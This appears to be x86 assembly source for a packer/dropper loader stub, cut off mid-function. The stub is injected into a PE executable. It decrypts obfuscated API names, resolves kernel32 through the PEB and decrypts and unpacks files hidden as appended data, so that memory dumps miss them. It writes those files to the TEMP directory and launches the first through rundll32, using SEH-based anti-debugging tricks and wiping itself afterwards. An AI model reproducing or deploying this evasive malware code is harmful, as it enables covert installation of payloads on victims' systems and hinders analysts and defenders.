.686p
.model flat, stdcall

INCLUDE pe.inc
INCLUDE prot_macro.inc

RvaToOffset PROTO Rva:DWORD, ImageNtHeaders:DWORD
OffsetToRva PROTO Offs:DWORD, ImageNtHeaders:DWORD
IntervalRand PROTO LowValue:DWORD, HighValue:DWORD
ContinueWork PROTO Info:DWORD
Build1Loader PROTO pPEInfo:DWORD, LdrOffset:DWORD, JmpAddress:DWORD
Build15Loader PROTO pPEInfo:DWORD, LdrOffset:DWORD, RealLdrAddress:DWORD, RealLdrSize:DWORD, RealLdrDSize:DWORD

PEInfo STRUC
	hPEFile				dd ?
	hMappedFile			dd ?
	FileBase			dd ?
	ImageDosHeader		dd ?
	ImageNtHeaders		dd ?
	ImageFileHeader		dd ?
	ImageOptionalHeader	dd ?
PEInfo ENDS

AppendFile STRUC
	signature		dd ?
	fileName		db 16 dup(?)
	fileSize		dd ?
	packFileSize	dd ?
AppendFile ENDS

LoaderInfo STRUC
	pPEInfo dd ?
	CurrentOffset dd ?
	UnpackDir	db 128 dup(?)
LoaderInfo ENDS

STARTUPINFO STRUC
	cb	dd ?
	lpReserved	dd ?
	lpDesktop	dd ?
	lpTitle		dd ?
	dwX			dd ?
	dwY			dd ?
	dwXSize		dd ?
	dwYSize		dd ?
	dwXCountChars	dd ?
	dwYCountChars	dd ?
	dwFillAttribute	dd ?
	dwFlags			dd ?
	wShowWindow		dw ?
	cbReserved2		dw ?
	lpReserved2		dd ?
	hStdInput		dd ?
	hStdOutput		dd ?
	hStdError		dd ?
STARTUPINFO ENDS

PROCESS_INFORMATION STRUC
	hProcess	dd ?
	hThread		dd ?
	dwProcessId	dd ?
	dwThreadId	dd ?
PROCESS_INFORMATION ENDS
	
.data
OEPRva dd 0
NextStageOff dd 0
NextStageRVA dd 0
OldCodeOffs dd 0
OldCodeSize dd 0
RealLdrRVA dd 0

.code
assume fs:nothing

real_loader_start:
ImageBase					dd 0
KernelBase					dd 0
OriginalCode				dd 0
OriginalCodeSize			dd 0
OriginalEP					dd 0
FileHandle					dd 0
UnpackHandle				dd 0
DllHandle					dd 0
DllApi						dd 0
CreateFileAPI				dd 0
CreateFileWAPI				dd 0
CreateDirectoryAPI			dd 0
CloseHandleAPI				dd 0
SetFilePointerAPI			dd 0
WriteFileAPI				dd 0
ReadFileAPI					dd 0
GetModuleFileNameAPI		dd 0
VirtualAllocAPI				dd 0
VirtualFreeAPI				dd 0
WinExecAPI					dd 0
LoadLibraryAPI				dd 0
GetProcAddressAPI			dd 0
FreeLibraryAPI				dd 0
GetEnvironmentVariableAPI	dd 0

CreateFileS					db 'CreateFileA',0
CreateFile_s				equ $ - CreateFileS

CreateFileWS				db 'CreateFileW',0
CreateFileW_s				equ $ - CreateFileWS

CreateDirectoryS			db 'CreateDirectoryA',0
CreateDirectory_s			equ $ - CreateDirectoryS

CloseHandleS				db 'CloseHandle',0
CloseHandle_s				equ $ - CloseHandleS

SetFilePointerS				db 'SetFilePointer',0
SetFilePointer_s			equ $ - SetFilePointerS

WriteFileS					db 'WriteFile',0
WriteFile_s					equ $ - WriteFileS

ReadFileS					db 'ReadFile',0
ReadFile_s					equ $ - ReadFileS

GetModuleFileNameS			db 'GetModuleFileNameW',0
GetModuleFileName_s			equ $ - GetModuleFileNameS

VirtualAllocS				db 'VirtualAlloc',0
VirtualAlloc_s				equ $ - VirtualAllocS

VirtualFreeS				db 'VirtualFree',0
VirtualFree_s				equ $ - VirtualFreeS

WinExecS					db 'WinExec', 0
WinExec_s					equ $ - WinExecS

CreateProcessS				db 'CreateProcessA', 0
CreateProcess_s				equ $ - CreateProcessS

LoadLibraryS				db 'LoadLibraryA', 0
LoadLibrary_s				equ $ - LoadLibraryS

FreeLibraryS				db 'FreeLibrary', 0
FreeLibrary_s				equ $ - FreeLibraryS

GetProcAddressS				db 'GetProcAddress', 0
GetProcAddress_s			equ $ - GetProcAddressS

GetEnvironmentVariableS		db 'GetEnvironmentVariableA', 0
GetEnvironmentVariable_s	equ $ - GetEnvironmentVariableS

MemoryPtr				dd 0

AppendInfo				AppendFile {}
AppendInfo_s			equ $ - AppendInfo

UnpackDir				db 256 dup(0),0 ; directory where the files will be unpacked
UnpackDir_s				equ $ - UnpackDir

UnpackDirLen			dd 0 ; length of unpack directory

BytesRead				dd 0

RunDllCmd				db 'rundll32.exe '
RunDllCmd_s				equ $ - RunDllCmd
ExeFile					db 320 dup(0),0 ; full path of the executable
ExeFile_s				equ $ - ExeFile

;DllFunction				db ',HM_sMain', 0
DllFunction				db ',HFF8', 0
DllFunction_S			equ $ - DllFunction

EnvVarTmp				db 'TMP', 0
EnvVarTmp_s				equ $ - EnvVarTmp

EnvVarTemp				db 'TEMP', 0
EnvVarTemp_s			equ $ - EnvVarTemp

;MainFunct				db 'HM_CreateProcess', 0
MainFunct				db 'HFF5', 0
MainFunct_s				equ $ - MainFunct

FirstFile				dd 0

Buffer					db 512 dup(0),0 ; general purpose buffer
Buffer_s				equ ($ - Buffer)/2

size_ldr_data equ $ - real_loader_start

@ImageBase				= ImageBase				- real_loader_start
@KernelBase				= KernelBase			- real_loader_start
@OriginalCode			= OriginalCode			- real_loader_start
@OriginalCodeSize		= OriginalCodeSize		- real_loader_start
@OriginalEP				= OriginalEP			- real_loader_start
@FileHandle				= FileHandle			- real_loader_start
@UnpackHandle			= UnpackHandle			- real_loader_start
@DllHandle				= DllHandle				- real_loader_start
@DllApi					= DllApi				- real_loader_start

@CreateFile				= CreateFileAPI				- real_loader_start
@CreateFileW			= CreateFileWAPI			- real_loader_start
@CreateDirectory		= CreateDirectoryAPI		- real_loader_start
@CloseHandle			= CloseHandleAPI			- real_loader_start
@SetFilePointer			= SetFilePointerAPI			- real_loader_start
@WriteFile				= WriteFileAPI				- real_loader_start
@ReadFile				= ReadFileAPI				- real_loader_start
@GetModuleFileName		= GetModuleFileNameAPI		- real_loader_start
@VirtualAlloc			= VirtualAllocAPI			- real_loader_start
@VirtualFree			= VirtualFreeAPI			- real_loader_start
@WinExec				= WinExecAPI				- real_loader_start
@LoadLibrary			= LoadLibraryAPI			- real_loader_start
@FreeLibrary			= FreeLibraryAPI			- real_loader_start
@GetProcAddress			= GetProcAddressAPI			- real_loader_start
@GetEnvironmentVariable = GetEnvironmentVariableAPI - real_loader_start

@CreateFileS				= CreateFileS			- real_loader_start
@CreateFileWS				= CreateFileWS			- real_loader_start
@CloseHandleS				= CloseHandleS			- real_loader_start
@SetFilePointerS			= SetFilePointerS		- real_loader_start
@WriteFileS					= WriteFileS			- real_loader_start
@ReadFileS					= ReadFileS				- real_loader_start
@GetModuleFileNameS			= GetModuleFileNameS	- real_loader_start
@VirtualAllocS				= VirtualAllocS			- real_loader_start
@VirtualFreeS				= VirtualFreeS			- real_loader_start
@LoadLibraryS				= LoadLibraryS			- real_loader_start
@FreeLibraryS				= FreeLibraryS			- real_loader_start
@GetProcAddressS			= GetProcAddressS		- real_loader_start
@WinExecS					= WinExecS				- real_loader_start
@GetEnvironmentVariableS	= GetEnvironmentVariableS - real_loader_start
@CreateDirectoryS			= CreateDirectoryS		- real_loader_start
@MemoryPtr					= MemoryPtr				- real_loader_start
@AppendInfo					= AppendInfo			- real_loader_start
@UnpackDir					= UnpackDir				- real_loader_start
@UnpackDirLen				= UnpackDirLen			- real_loader_start
@BytesRead					= BytesRead				- real_loader_start
@RunDllCmd					= RunDllCmd				- real_loader_start
@EnvVarTmp					= EnvVarTmp				- real_loader_start
@EnvVarTemp					= EnvVarTemp			- real_loader_start
@MainFunct					= MainFunct				- real_loader_start
@ExeFile					= ExeFile				- real_loader_start
@DllFunction				= DllFunction			- real_loader_start
@FirstFile					= FirstFile				- real_loader_start
@Buffer						= Buffer				- real_loader_start

	pop esi
	mov [esi+@ImageBase], eax

	seh_call call_handler, get_kernel32_base, esi
	mov [esi+@KernelBase], eax
	
	seh_call call_handler, get_entry_points, esi
	
	mov eax, UnpackDir_s
	push eax
	lea eax, [esi+@UnpackDir]
	push eax
	seh_call call_handler, decrypt_string, esi
	
	; restore original code
	
	mov ecx, [esi+@OriginalCodeSize]
	push esi
	push edi
	mov eax, [esi+@OriginalCode]
	mov edi, [esi+@OriginalEP]
	add eax, [esi+@ImageBase]
	add edi, [esi+@ImageBase]
	mov esi, eax
	rep movsb
	pop edi
	pop esi
	
	mov eax, Buffer_s
	push eax
	lea eax, [esi+@Buffer]
	push eax
	lea eax, [esi+@EnvVarTmp]
	push eax
	call dword ptr [esi+@GetEnvironmentVariable]
	test eax, eax
	jnz env_ok
	mov eax, Buffer_s
	push eax
	lea eax, [esi+@Buffer]
	push eax
	lea eax, [esi+@EnvVarTemp]
	push eax
	call dword ptr [esi+@GetEnvironmentVariable]
	test eax, eax
	jz done2
	
env_ok:
	push eax
	lea edi, [esi+@UnpackDir]
	xor eax, eax
	mov ecx, 0FFFFFFFFh
	repnz scasb
	neg ecx
	dec ecx
	pop eax
	
	lea edi, [esi+@Buffer]
	add edi, eax
	lea eax, [esi+@UnpackDir]
	push esi
	mov esi, eax
	rep movsb
	pop esi
	
	; copy Buffer to UnpackDir
	lea eax, [esi+@Buffer]
	sub edi, eax
	mov ecx, edi
	lea edi, [esi+@UnpackDir]
	lea eax, [esi+@Buffer]
	push esi
	mov esi, eax
	rep movsb
	pop esi
	
	push 0
	lea eax, [esi+@UnpackDir]
	push eax
	call dword ptr [esi+@CreateDirectory]
	
	; extract, unpack and store appended files
	; step 1: we get the full path name of the current image file (that is the executable), we need to do this
	;		  since the files to unpack are appended to the file, and will not be mapped when the image is loaded,
	;	      this way a dump will not contain the files
	; step 2: CreateFile on the returned path, seek to the start of the appended file
	; step 3: search for an header, if it is found, read it, read the file and unpack it in the specified directory
	; step 4: the first file gets executed (the first file must be the executable)
	
	mov eax, Buffer_s
	push eax
	lea eax, [esi+@Buffer]
	push eax
	push 0
	call dword ptr [esi+@GetModuleFileName]
	
	push 0
	push 0
	push 3 ; OPEN_EXISTING
	push 0
	push 1 ; FILE_SHARE_READ
	push 80000000h ; GENERIC_READ
	lea eax, [esi+@Buffer]
	push eax
	call dword ptr [esi+@CreateFileW]
	cmp eax, -1
	jz done2
	
	mov [esi+@FileHandle], eax
	
	mov edi, [esi+@ImageBase]
	add edi, [edi.IMAGE_DOS_HEADER.e_lfanew]
	movzx eax, word ptr [edi.IMAGE_NT_HEADERS.FileHeader.IMAGE_FILE_HEADER.NumberOfSections]
	dec eax
	movzx ebx, [edi.IMAGE_NT_HEADERS.FileHeader.IMAGE_FILE_HEADER.SizeOfOptionalHeader]
	add edi, ebx
	add edi, 18h
	imul eax, 40
	add eax, edi
	mov edi, [eax.IMAGE_SECTION_HEADER.PointerToRawData]
	add edi, [eax.IMAGE_SECTION_HEADER.SizeOfRawData]
	
	push 0
	push 0
	push edi
	push [esi+@FileHandle]
	call dword ptr [esi+@SetFilePointer]
	
	mov dword ptr [esi+@FirstFile], 1
	
unpack_loop:
	push 0
	lea eax, [esi+@BytesRead]
	push eax
	mov eax, AppendInfo_s
	push eax
	lea eax, [esi+@AppendInfo]
	push eax
	push dword ptr [esi+@FileHandle]
	call dword ptr [esi+@ReadFile]
	test eax, eax
	jz done2
	mov eax, [esi+@BytesRead]
	test eax, eax
	jz continue2
	
	lea eax, [esi+@AppendInfo]
	push eax
	seh_call call_handler, decrypt_header, esi

	lea eax, [esi+@AppendInfo]
	mov eax, [eax.AppendFile.packFileSize]
	
	push 4 ; PAGE_READWRITE
	push 1000h; MEM_COMMIT
	push eax
	push 0
	call dword ptr [esi+@VirtualAlloc]
	test eax, eax
	jz done2
	mov [esi+@MemoryPtr], eax
	
	push 0
	lea eax, [esi+@BytesRead]
	push eax
	lea eax, [esi+@AppendInfo]
	mov eax, [eax.AppendFile.packFileSize]
	push eax
	push dword ptr [esi+@MemoryPtr]
	push dword ptr [esi+@FileHandle]
	call dword ptr [esi+@ReadFile]
	test eax, eax
	jz done2
	mov eax, [esi+@BytesRead]
	test eax, eax
	jz done2
	
	lea eax, [esi+@AppendInfo]
	push dword ptr [eax.AppendFile.fileSize]
	push dword ptr [esi+@MemoryPtr]
	seh_call call_handler, unpack_file, esi
	push eax
	
	; free the old buffer
	push 8000h ; MEM_RELEASE
	push 0
	push dword ptr [esi+@MemoryPtr]
	call dword ptr [esi+@VirtualFree]
	
	pop eax
	mov [esi+@MemoryPtr], eax ; now MemoryPtr points to the unpacked file buffer
	
	lea edi, [esi+@UnpackDir]
	xor eax, eax
	mov ecx, 0FFFFFFFFh
	repne scasb
	neg ecx
	sub ecx, 2 ; ecx = unpack dir length
	mov [esi+@UnpackDirLen], ecx
	lea edi, [esi+@UnpackDir]
	add edi, ecx ; edi points to the last character of the unpack dir string
	push edi
	
	lea eax, [esi+@AppendInfo]
	lea edi, [eax.AppendFile.fileName]
	xor eax, eax
	mov ecx, 0FFFFFFFFh
	repne scasb
	neg ecx
	sub edi, ecx
	inc edi
	mov ebx, edi
	pop edi
	push esi
	mov esi, ebx
	rep movsb
	mov byte ptr [edi], 0 ; null terminate the string
	pop esi
	
	cmp dword ptr [esi+@FirstFile], 1
	jnz continue
	
	lea eax, [esi+@UnpackDir]
	sub edi, eax
	dec edi ; edi = full path length
	mov ecx, edi
	lea edi, [esi+@ExeFile]
	lea eax, [esi+@UnpackDir]
	push esi
	mov esi, eax
	rep movsb
	pop esi
	mov dword ptr [esi+@FirstFile], 0
	
continue:
	
	push 0
	push 0
	push 1 ; CREATE_NEW
	push 0
	push 0
	push 80000000h + 40000000h ; GENERIC_READ | GENERIC_WRITE
	lea eax, [esi+@UnpackDir]
	push eax
	call dword ptr [esi+@CreateFile]
	cmp eax, 0FFFFFFFFh
	jz done2
	
	mov [esi+@UnpackHandle], eax
	push 0
	lea eax, [esi+@BytesRead]
	push eax
	lea eax, [esi+@AppendInfo]
	push dword ptr [eax.AppendFile.fileSize]
	push dword ptr [esi+@MemoryPtr]
	push dword ptr [esi+@UnpackHandle]
	call dword ptr [esi+@WriteFile]
	test eax, eax
	jz done2
	
	push dword ptr [esi+@UnpackHandle]
	call dword ptr [esi+@CloseHandle]
	
	push 8000h ; MEM_RELEASE
	push 0
	push dword ptr [esi+@MemoryPtr]
	call dword ptr [esi+@VirtualFree]
	
	mov ecx, [esi+@UnpackDirLen]
	lea edi, [esi+@UnpackDir]
	add edi, ecx
	mov byte ptr [edi], 0 ; resets UnpackDir
	
	jmp unpack_loop
	
continue2:
	
	lea eax, [esi+@ExeFile]
	push eax
	call dword ptr [esi+@LoadLibrary]
	
	mov [esi+@DllHandle], eax
	
	lea ebx, [esi+@MainFunct]
	push ebx
	push eax
	call dword ptr [esi+@GetProcAddress]
	
	mov [esi+@DllApi], eax
	
	xor eax, eax
	lea edi, [esi+@ExeFile]
	repne scasb
	dec edi
	
	lea eax, [esi+@DllFunction]
	mov ecx, DllFunction_s
	push esi
	mov esi, eax
	rep movsb
	pop esi
	
	lea edi, [esi+@Buffer]
	xor eax, eax
	mov ecx, 257
	rep stosb
	
	lea eax, [esi+@Buffer]
	mov [eax.STARTUPINFO.cb], 68
	mov ebx, eax
	
	add eax, 68
	push eax
	push ebx
	push 0
	lea eax, [esi+@RunDllCmd]
	push eax
	mov edi, [esi+@DllApi]
	call edi
	
	mov eax, [esi+@DllHandle]
	push eax
	call dword ptr [esi+@FreeLibrary]
	
;	push 1
;	lea eax, [esi+@RunDllCmd]
;	push eax
;	call dword ptr [esi+@WinExec]
	
done2:
	mov eax, [esi+@OriginalEP]
	add eax, [esi+@ImageBase]
	mov [esp+24h], eax
	xor eax, eax
	mov ecx, $ - real_loader_start
	mov edi, esi
	rep stosb
	popad
	popfd
	ret
	
decrypt_header:
	seh_called
	push ebp
	mov ebp, esp
	
	mov eax, AppendInfo_s
	xor ecx, ecx
	mov edi, [ebp+08h]
hdr_loop:
	xor byte ptr [edi+ecx], 66h
	inc ecx
	cmp ecx, eax
	jnz hdr_loop
	
	pop ebp
	ret 4
	
aP_depack_asm:
    pushad

    mov    esi, [esp + 36]    ; C calling convention
    mov    edi, [esp + 40]

    cld
    mov    dl, 80h
    xor    ebx, ebx

literal:
    movsb
    mov    bl, 2
nexttag:
    call   getbit
    jnc    literal

    xor    ecx, ecx
    call   getbit
    jnc    codepair
    xor    eax, eax
    call   getbit
    jnc    shortmatch
    mov    bl, 2
    inc    ecx
    mov    al, 10h
getmorebits:
    call   getbit
    adc    al, al
    jnc    getmorebits
    jnz    domatch
    stosb
    jmp    short nexttag
codepair:
    call   getgamma_no_ecx
    sub    ecx, ebx
    jnz    normalcodepair
    call   getgamma
    jmp    short domatch_lastpos

shortmatch:
    lodsb
    shr    eax, 1
    jz     donedepacking
    adc    ecx, ecx
    jmp    short domatch_with_2inc

normalcodepair:
    xchg   eax, ecx
    dec    eax
    shl    eax, 8
    lodsb
    call   getgamma
    cmp    eax, 32000
    jae    domatch_with_2inc
    cmp    ah, 5
    jae    domatch_with_inc
    cmp    eax, 7fh
    ja     domatch_new_lastpos

domatch_with_2inc:
    inc    ecx

domatch_with_inc:
    inc    ecx

domatch_new_lastpos:
    xchg   eax, ebp
domatch_lastpos:
    mov    eax, ebp

    mov    bl, 1

domatch:
    push   esi
    mov    esi, edi
    sub    esi, eax
    rep    movsb
    pop    esi
    jmp    short nexttag

getbit:
    add     dl, dl
    jnz     stillbitsleft
    mov     dl, [esi]
    inc     esi
    adc     dl, dl
stillbitsleft:
    ret

getgamma:
    xor    ecx, ecx
getgamma_no_ecx:
    inc    ecx
getgammaloop:
    call   getbit
    adc    ecx, ecx
    call   getbit
    jc     getgammaloop
    ret

donedepacking:
    sub    edi, [esp + 40]
    mov    [esp + 28], edi    ; return unpacked length in eax
    
    popad
    ret
    
unpack_file:
	seh_called
	push ebp
	mov ebp, esp
	sub esp, 08h
	
	push 04h
	push 1000h
	push dword ptr [ebp+0Ch]
	push 0
	call dword ptr [esi+@VirtualAlloc]
	mov [ebp-08h], eax
	
	push eax
	push dword ptr [ebp+08h]
	call aP_depack_asm
	
	mov eax, [ebp-08h]
	mov esp, ebp
	pop ebp
	ret 08h
	
get_entry_points:
	seh_called
	push ebp
	mov ebp, esp
	
	mov eax, CreateFileW_s
	push eax
	lea eax, [esi+@CreateFileWS]
	push eax
	seh_call call_handler, decrypt_string, esi
	
	mov eax, CreateFileW_s
	push eax
	lea eax, [esi+@CreateFileWS]
	push eax
	push [esi+@KernelBase]
	push esi
	seh_call call_handler, get_proc_address, esi
	mov [esi+@CreateFileW], eax

	mov eax, CreateFile_s
	push eax
	lea eax, [esi+@CreateFileS]
	push eax
	seh_call call_handler, decrypt_string, esi
	
	mov eax, CreateFile_s
	push eax
	lea eax, [esi+@CreateFileS]
	push eax
	push [esi+@KernelBase]
	push esi
	seh_call call_handler, get_proc_address, esi
	mov [esi+@CreateFile], eax
	
	mov eax, CloseHandle_s
	push eax
	lea eax, [esi+@CloseHandleS]
	push eax
	seh_call call_handler, decrypt_string, esi
	
	mov eax, CloseHandle_s
	push eax
	lea eax, [esi+@CloseHandleS]
	push eax
	push [esi+@KernelBase]
	push esi
	seh_call call_handler, get_proc_address, esi
	mov [esi+@CloseHandle], eax

	mov eax, SetFilePointer_s
	push eax
	lea eax, [esi+@SetFilePointerS]
	push eax
	seh_call call_handler, decrypt_string, esi
	
	mov eax, SetFilePointer_s
	push eax
	lea eax, [esi+@SetFilePointerS]
	push eax
	push [esi+@KernelBase]
	push esi
	seh_call call_handler, get_proc_address, esi
	mov [esi+@SetFilePointer], eax
	
	mov eax, WriteFile_s
	push eax
	lea eax, [esi+@WriteFileS]
	push eax
	seh_call call_handler, decrypt_string, esi
	
	mov eax, WriteFile_s
	push eax
	lea eax, [esi+@WriteFileS]
	push eax
	push [esi+@KernelBase]
	push esi
	seh_call call_handler, get_proc_address, esi
	mov [esi+@WriteFile], eax
	
	mov eax, ReadFile_s
	push eax
	lea eax, [esi+@ReadFileS]
	push eax
	seh_call call_handler, decrypt_string, esi
	
	mov eax, ReadFile_s
	push eax
	lea eax, [esi+@ReadFileS]
	push eax
	push [esi+@KernelBase]
	push esi
	seh_call call_handler, get_proc_address, esi
	mov [esi+@ReadFile], eax
	
	mov eax, GetModuleFileName_s
	push eax
	lea eax, [esi+@GetModuleFileNameS]
	push eax
	seh_call call_handler, decrypt_string, esi
	
	mov eax, GetModuleFileName_s
	push eax
	lea eax, [esi+@GetModuleFileNameS]
	push eax
	push [esi+@KernelBase]
	push esi
	seh_call call_handler, get_proc_address, esi
	mov [esi+@GetModuleFileName], eax
	
	mov eax, VirtualAlloc_s
	push eax
	lea eax, [esi+@VirtualAllocS]
	push eax
	seh_call call_handler, decrypt_string, esi
	
	mov eax, VirtualAlloc_s
	push eax
	lea eax, [esi+@VirtualAllocS]
	push eax
	push [esi+@KernelBase]
	push esi
	seh_call call_handler, get_proc_address, esi
	mov [esi+@VirtualAlloc], eax
	
	mov eax, VirtualFree_s
	push eax
	lea eax, [esi+@VirtualFreeS]
	push eax
	seh_call call_handler, decrypt_string, esi
	
	mov eax, VirtualFree_s
	push eax
	lea eax, [esi+@VirtualFreeS]
	push eax
	push [esi+@KernelBase]
	push esi
	seh_call call_handler, get_proc_address, esi
	mov [esi+@VirtualFree], eax
	
	mov eax, WinExec_s
	push eax
	lea eax, [esi+@WinExecS]
	push eax
	seh_call call_handler, decrypt_string, esi
	
	mov eax, WinExec_s
	push eax
	lea eax, [esi+@WinExecS]
	push eax
	push [esi+@KernelBase]
	push esi
	seh_call call_handler, get_proc_address, esi
	mov [esi+@WinExec], eax
	
	mov eax, LoadLibrary_s
	push eax
	lea eax, [esi+@LoadLibraryS]
	push eax
	seh_call call_handler, decrypt_string, esi
	
	mov eax, LoadLibrary_s
	push eax
	lea eax, [esi+@LoadLibraryS]
	push eax
	push [esi+@KernelBase]
	push esi
	seh_call call_handler, get_proc_address, esi
	mov [esi+@LoadLibrary], eax
	
	mov eax, FreeLibrary_s
	push eax
	lea eax, [esi+@FreeLibraryS]
	push eax
	seh_call call_handler, decrypt_string, esi
	
	mov eax, FreeLibrary_s
	push eax
	lea eax, [esi+@FreeLibraryS]
	push eax
	push [esi+@KernelBase]
	push esi
	seh_call call_handler, get_proc_address, esi
	mov [esi+@FreeLibrary], eax
	
	mov eax, GetProcAddress_s
	push eax
	lea eax, [esi+@GetProcAddressS]
	push eax
	seh_call call_handler, decrypt_string, esi
	
	mov eax, GetProcAddress_s
	push eax
	lea eax, [esi+@GetProcAddressS]
	push eax
	push [esi+@KernelBase]
	push esi
	seh_call call_handler, get_proc_address, esi
	mov [esi+@GetProcAddress], eax
	
	mov eax, GetEnvironmentVariable_s
	push eax
	lea eax, [esi+@GetEnvironmentVariableS]
	push eax
	seh_call call_handler, decrypt_string, esi
	
	mov eax, GetEnvironmentVariable_s
	push eax
	lea eax, [esi+@GetEnvironmentVariableS]
	push eax
	push [esi+@KernelBase]
	push esi
	seh_call call_handler, get_proc_address, esi
	mov [esi+@GetEnvironmentVariable], eax
	
	mov eax, CreateDirectory_s
	push eax
	lea eax, [esi+@CreateDirectoryS]
	push eax
	seh_call call_handler, decrypt_string, esi
	
	mov eax, CreateDirectory_s
	push eax
	lea eax, [esi+@CreateDirectoryS]
	push eax
	push [esi+@KernelBase]
	push esi
	seh_call call_handler, get_proc_address, esi
	mov [esi+@CreateDirectory], eax
	
	pop ebp
	ret
	
;[ebp+08h] = loader base
;[ebp+0Ch] = module image base
;[ebp+10h] = pointer to function name
;[ebp+14h] = name length
;returns the address of the specified function
get_proc_address:
	seh_called
	push ebp
	mov ebp, esp
	push esi
	push edi
	push ebx
	
	mov edi, [ebp+0Ch]
	add edi, [edi.IMAGE_DOS_HEADER.e_lfanew]
	mov eax, [edi.IMAGE_NT_HEADERS.OptionalHeader.DataDirectory(IMAGE_DIRECTORY_ENTRY_EXPORT*8).VirtualAddress]
	mov ebx, [ebp+0Ch]
	add eax, ebx ; eax now points to export table
	
	mov esi, [eax.IMAGE_EXPORT_DIRECTORY.AddressOfFunctions]
	mov edi, [eax.IMAGE_EXPORT_DIRECTORY.AddressOfNames]
	add esi, ebx ; esi = AddressOfFunctions VA
	add edi, ebx ; edi = AddressOfNames VA
	
	xor ecx, ecx
	
search_export:
	push eax
	mov eax, [edi+ecx*4]
	add eax, ebx
	push esi
	push edi
	mov esi, eax
	mov edi, [ebp+10h]
	push ecx
	mov ecx, [ebp+14h]
	repz cmpsb
	jz found
	pop ecx
	inc ecx
	pop edi
	pop esi
	pop eax
	cmp ecx, [eax.IMAGE_EXPORT_DIRECTORY.NumberOfFunctions]
	jnz search_export
	xor eax, eax
	jmp not_found
	
found:
	pop ecx
	pop edi
	pop esi
	pop eax
	mov eax, [esi+ecx*4]
	add eax, ebx
	
not_found:
	pop ebx
	pop edi
	pop esi
	pop ebp
	ret 10h
	
get_kernel32_base:
	seh_called
	push edx
	push esi
	
	gen_instr2 xor, eax, eax
	gen_instr2 xor, edx, edx
	gen_instr2 mov, dl, 30h
	gen_instr2 mov, eax, <dword ptr fs:[edx]>
	gen_instr2 test, eax, eax
	gen_instr2 jz, done
	gen_instr2 mov, eax, [eax+0Ch]
	gen_instr2 mov, esi, [eax+1Ch]
	gen_instr2 lodsd
	gen_instr2 mov, eax, [eax+08h]
	
	gen_instr2 pop, esi, , done
	gen_instr2 pop, edx
	ret
	
decrypt_string:
	seh_called
	push ebp
	mov ebp, esp
	push esi
	
	xor ecx, ecx
	mov esi, [ebp+08h]
	
dec_loop:
	movzx eax, byte ptr [esi+ecx]
	ror al, 03h
	xor al, 44h
	mov byte ptr [esi+ecx], al
	inc ecx
	cmp ecx, dword ptr [ebp+0ch]
	jnz dec_loop
	
	pop esi
	pop ebp
	ret 08h
	
call_handler:
	gen_instr2 mov, ecx, [esp+0Ch]
	mov dword ptr [ecx+04h], 0
	mov dword ptr [ecx+08h], 0
	mov dword ptr [ecx+0Ch], 0
	mov dword ptr [ecx+10h], 0
	mov dword ptr [ecx+14h], 0
	mov dword ptr [ecx+18h], 155h
	mov ebx, [ecx+0A4h]
	push ecx
	push ebx
	gen_instr2 pop, ebx
	gen_instr2 pop, ecx
	gen_instr2 sub, eax, ebx
	gen_instr2 mov, eax, dword ptr [ecx+09Ch]
	gen_instr2 mov, dword ptr [ecx+0B8h], eax
	xor eax, eax
	ret
	
crash_it:
	push ecx
	push eax
	cpuid
	rdtsc
	pop eax
	pop ecx
	
	mov dword ptr [ecx+0B8h], eax
	xor eax, eax
	ret
	
real_loader_end:
real_loader_size EQU $ - real_loader_start

ContinueWork PROC uses esi edi Info:DWORD
	mov esi, Info
	test esi, esi
	jz invalid_info
	
	mov edi, [esi.LoaderInfo.pPEInfo]
	mov esi, [edi.PEInfo.ImageNtHeaders]
	mov eax, [esi.IMAGE_NT_HEADERS.OptionalHeader.IMAGE_OPTIONAL_HEADER.AddressOfEntryPoint]
	mov [OEPRva], eax
	mov esi, Info
	
	call PrepareAndCopyLdrs
	
	mov eax, 1
	jmp end1
invalid_info:
	xor eax, eax
end1:
	ret
ContinueWork ENDP

EncryptString:
	push ebp
	mov ebp, esp
	push esi
	
	xor ecx, ecx
	mov esi, [ebp+08h]
	
enc_loop:
	movzx eax, byte ptr [esi+ecx]
	xor al, 44h
	rol al, 03h
	mov byte ptr [esi+ecx], al
	inc ecx
	cmp ecx, dword ptr [ebp+0Ch]
	jnz enc_loop
	
	pop esi
	pop ebp
	ret 08h
	
PrepareRealLoader:
	push esi
	push edi
	
	mov edi, [esi.LoaderInfo.pPEInfo]
	invoke OffsetToRva, [OldCodeOffs], [edi.PEInfo.ImageNtHeaders]
	mov [OriginalCode], eax
	
	mov eax, [OldCodeSize]
	mov [OriginalCodeSize], eax
		
	mov eax, [OEPRva]
	mov [OriginalEP], eax
	
	lea edi, [esi.LoaderInfo.UnpackDir]
	xor eax, eax
	mov ecx, 0FFFFFFFFh
	repne scasb
	neg ecx
	lea edi, [UnpackDir]
	push esi
	lea esi, [esi.LoaderInfo.UnpackDir]
	rep movsb
	pop esi
	
	mov eax, CreateFile_s
	push eax
	lea eax, [CreateFileS]
	push eax
	call EncryptString

	mov eax, CreateFileW_s
	push eax
	lea eax, [CreateFileWS]
	push eax
	call EncryptString
	
	mov eax, CreateDirectory_s
	push eax
	lea eax, [CreateDirectoryS]
	push eax
	call EncryptString
	
	mov eax, CloseHandle_s
	push eax
	lea eax, [CloseHandleS]
	push eax
	call EncryptString
	
	mov eax, ReadFile_s
	push eax
	lea eax, [ReadFileS]
	push eax
	call EncryptString
	
	mov eax, WriteFile_s
	push eax
	lea eax, [WriteFileS]
	push eax
	call EncryptString
	
	mov eax, SetFilePointer_s
	push eax
	lea eax, [SetFilePointerS]
	push eax
	call EncryptString
	
	mov eax, GetModuleFileName_s
	push eax
	lea eax, [GetModuleFileNameS]
	push eax
	call EncryptString
	
	mov eax, VirtualFree_s
	push eax
	lea eax, [VirtualFreeS]
	push eax
	call EncryptString
	
	mov eax, VirtualAlloc_s
	push eax
	lea eax, [VirtualAllocS]
	push eax
	call EncryptString
	
	mov eax, WinExec_s
	push eax
	lea eax, [WinExecS]
	push eax
	call EncryptString
	
	mov eax, LoadLibrary_s
	push eax
	lea eax, [LoadLibraryS]
	push eax
	call EncryptString
	
	mov eax, GetProcAddress_s
	push eax
	lea eax, [GetProcAddressS]
	push eax
	call EncryptString
	
	mov eax, FreeLibrary_s
	push eax
	lea eax, [FreeLibraryS]
	push eax
	call EncryptString
	
	mov eax, GetEnvironmentVariable_s
	push eax
	lea eax, [GetEnvironmentVariableS]
	push eax
	call EncryptString
	
	mov eax, UnpackDir_s
	push eax
	lea eax, [UnpackDir]
	push eax
	call EncryptString
	
	pop edi
	pop esi
	ret

PrepareAndCopyLdrs:
	push ebp
	mov ebp, esp
	sub esp, 10Ch
	
	push edi
